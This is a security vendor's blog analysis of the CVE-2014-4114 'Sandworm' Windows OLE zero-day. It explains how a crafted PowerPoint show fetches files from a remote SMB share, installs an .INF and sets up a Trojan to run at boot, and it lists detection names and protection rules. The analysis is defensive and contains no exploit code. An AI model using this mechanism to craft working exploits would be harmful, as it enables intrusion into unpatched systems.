Prior to the release of Microsoft’s monthly patch Tuesday, a new zero-day exploiting Windows vulnerability covered in CVE-2014-4114 was reported by iSight. The said vulnerability affects desktop and server versions of Vista and Sever 2008 to current versions. It was believed to be associated in cyber attacks related to NATO by Russian cyber espionage group.
Based on our analysis, the vulnerability exists in PACKAGER.DLL, which is a part of Windows Object Linking and Embedding (OLE) property. By using a crafted PowerPoint document, an .INF file in embedded OLE object can be copied from a remote SMB share folder and installed on the system. Attackers can exploit this logic defect to execute another malware, downloaded via the same means.
The severity of the vulnerability is highly critical because it fairly simple to exploit. Since it is a logic defect, attackers need not to create Shellcode or Return Oriented Programming (ROP), a method to bypass DEP protection. DEP prevents the execution of code (including malicious Shellcode) from certain regions of computer memory (non-executable).If they (attackers) know the format then they can craft a PowerPoint exploit directly. Furthermore, since it has no heap spray, ROP, Shellcode, most of heuristic detection methods would have difficulty in detecting it.
The original logic includes two potential risky behaviors without user’s knowledge or consent, which should be carefully designed:
- Copy file from remote shared folder
- Install downloaded .INF fileWe analyzed the PPSX sample (MD5 hash: 330e8d23ab82e8a0ca6d166755408eb1) to investigate how it happens. We unzip the .PPSX file file to see the content files of this PPT exploit as seen below:
We analyzed the PPSX sample (MD5 hash: 330e8d23ab82e8a0ca6d166755408eb1) to investigate how it happens. We unzip the .PPSX file file to see the content files of this PPT exploit as seen below:
Figure 1. Folder structure of PPSX file
The following is the content of oleObject1.bin and oleObject2.bin. It indicates that the said OLE objects are resident in remote shared folder.
Figures 2-3 Content of oleObject1.bin and oleObject2.bin
And in slide1.xml, we can see it refer to two Packager Shell Object “rId4” and “rId5.”
Figure 4. Content of slide1.xml (part 1)
In slide1.xml.resl, “rId4” and “rId5” are defined as two OLE object above.
Figure 5. Content of slide1.xml.resl
When slide1 is opened, the files “slide1.gif” and “slides.inf” are copied to local by packager.dll. And in slide1.xml, some actions are described such as “-3”, and another is “3”. These two actions are called when loading two OLE objects. This routine is seen in packager!CPackage::DoVerb() function.
Figure 6. Content of slide1.xml (part 2)
In slide1.gif, if the parameter is “-3”, and the function will do nothing. However, if “slides.inf” is loaded and the parameter is “3”, it installs the .INF file. The screenshot below is the call stack when InfDefaultInstall.exe is executed:
Figure 7. Call stack of INF installation
After which, INF renames slide1.gif to slide1.gif.exe, and adds registry runonce value for it. This is done so that in the next system boot up, the Trojan is executed automatically.
We detect the exploit as TROJ_MDLOAD.PGTY, which in turn leads to the download of INF_BLACKEN.A when successfully exploited. This malware, on the other hand, downloads and executes the backdoor, which we detect as BKDR_BLACKEN.A.
Because of this vulnerability are not arduous to exploit, attackers may abuse this so as to create new malware payload. Trend Micro secures users from this threat via detecting the exploit and malware payload via its Smart Protection Network. Trend Micro Deep Security and Office Scan with the Intrusion Defense Firewall (IDF) plugin protect user systems from threats that may leverage this vulnerability via the following DPI rules:
- 1006290 – Microsoft Windows OLE Remote Code Execution Vulnerability (CVE-2014-4114)
- 1006291 Microsoft Windows OLE Remote Code Execution Vulnerability (CVE-2014-4114) – 1
Users are strongly advised to patch their systems once Microsoft releases their security update for this. In addition, it is recommended for users and employees not to open Powerpoint files from unknown sources as this may possibly lead to a series of malware infection.
Update as of October 15, 2014, 11:30 P.M.:
Microsoft has included the patch for the Sandworm vulnerability in its October 2014 Patch Tuesday.
Update as of October 16, 2014, 5:45 P.M.:
The Sandworm vulnerability has been linked to attacks against specific SCADA systems. Read more about this in our post titled Sandworm to Blacken: The SCADA Connection.
With additional analysis from Kai Yu